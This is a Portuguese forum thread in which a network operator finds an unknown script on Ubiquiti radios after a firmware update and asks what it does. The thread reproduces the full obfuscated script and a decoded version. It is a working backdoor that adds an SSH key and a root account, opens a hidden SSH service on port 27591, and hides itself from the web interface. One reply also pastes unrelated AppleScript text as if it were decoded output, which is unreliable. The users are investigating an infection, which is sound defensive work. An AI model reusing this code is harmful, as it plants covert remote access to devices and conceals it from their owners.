Página 1 de 2 12 ÚltimoÚltimo
+ Responder ao Tópico



  1. Olá pessoal, sou novo no fórum e esse é meu primeiro tópico.
    Estou atualizando vários equipamentos Ubiquiti para a versão 5.6.4, percebi que desde sábado tenho encontrado equipamentos que não aceitam atualização do firmware, eles dão erro de arquivo corrompido e não aceitam atualizar, porém se eu clico na notificação de nova versão que aparece no canto inferior direito ele aceita atualizar. Depois de atualizado para 5.6.4 o sistema desses equipamentos exibe um script que foi instalado no equipamento, só nós não instalamos script nenhum, eu baixei e não tenho ideia do que isso faz nesses aparelhos, o nome do arquivo é "rc.prestart.sh", segue abaixo as linhas dele:

    #!/bin/sh
    mkdir -p /var/bin
    cat << EOFEOFEOF | uudecode -o /var/bin/cgi -
    begin-base64 755 -
    IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl
    bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz
    YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t
    ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM
    ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1
    R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH
    QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z
    a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w
    Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv
    cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp
    clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0
    Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r
    ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl
    bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt
    YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k
    ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg
    LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF
    UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv
    cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn
    c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp
    Jwo=
    ====
    EOFEOFEOF
    chmod 755 /var/bin/cgi 2>/dev/null
    sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf
    sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf


    Eu já achei oito aparelhos com isso e todos eles se recusavam a atualizar o firmware que eu baixei do site oficial da Uibiquiti, todos os equipamentos estavam com a versão 5.5.10 antes de atualizar. Alguém tem ideia do que é isso? Obrigado.

  2. Bem suspeito mesmo, veja o conteúdo que estava criptografado!

    Código :
    #!/bin/shif [ "$HTTP_HOST" = "localhost.localnet" ]; then
        PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys
        echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd
     
     
        if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then
            dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1
        fi
     
     
        dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
        iptables -I INPUT -p tcp --dport 22 -j ACCEPT
        iptables -I INPUT -p tcp --dport 27591 -j ACCEPT
    fi
     
     
    grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'



  3. Obrigado radar02123, isso aí é algum dropper, trojan, worm ou coisa assim? Nós já tivemos problemas com o Skynet no passado e precisamos limpar cada um dos nossos equipamentos, parece que vai ser o caso novamente, se for mesmo alguma nova praga falta saber o nome dela.

  4. Decriptografando da esse trecho...
    set theButtonNames to {"Set Used Prefs (all *'ed items)", "Set SWUpdateServer*", "List SWUpdateServer", "Remove SWUpdateServer", "Set MacHQ homepage*", "Disable Sleep*", "Rename HD by Size*", "Install MHQ Reset Script", "Remove Current User & Reset CPU", "Test for Flashback Trojan", "Test for ShellShock vulnerability", "Rebuild Launch Services DB", "Flush DNS Cache", "Reset Fake preferences", "Update Fake Workflows from Server", "Install SWUpdate StartupItem", "Save System Profiler Report to server"}



  5. Citação Postado originalmente por ab5x2 Ver Post
    E, já tentou reinstalar o firmware por TFTP?
    Não tentei ainda porque estes equipamentos eu acesso remotamente, também disseram para eu fazer isso no chat da Ubiquiti ontem a noite. Eu consigo atualizar o firmware pela guia "System" na página de configuração do equipamento, depois de atualizado para a versão 5.6.4 esse script fica visível na guia "Main", é só excluir e salvar que ele some.
    A minha preocupação é saber o que isso faz nos equipamentos e se eu vou ter que limpar de novo todos esses equipamentos igual na vez do antigo Skynet.






Tópicos Similares

  1. Como bloquear MSN somente em alguns IPs?
    Por pataquada2 no fórum Redes
    Respostas: 6
    Último Post: 25-09-2007, 08:39
  2. lentidao em alguns provedores de e mail
    Por Rhander no fórum Redes
    Respostas: 1
    Último Post: 22-06-2007, 09:27
  3. PROBLEMAS EM ALGUNS SITES
    Por cristianff no fórum Servidores de Rede
    Respostas: 6
    Último Post: 27-09-2006, 10:13
  4. download apenas em alguns sites...tem como!?
    Por evalerio no fórum Servidores de Rede
    Respostas: 1
    Último Post: 01-03-2005, 16:08
  5. a versão do squid 2.4 em alguns segundo stop
    Por no fórum Servidores de Rede
    Respostas: 5
    Último Post: 15-05-2003, 07:50

Visite: BR-Linux ·  VivaOLinux ·  Dicas-L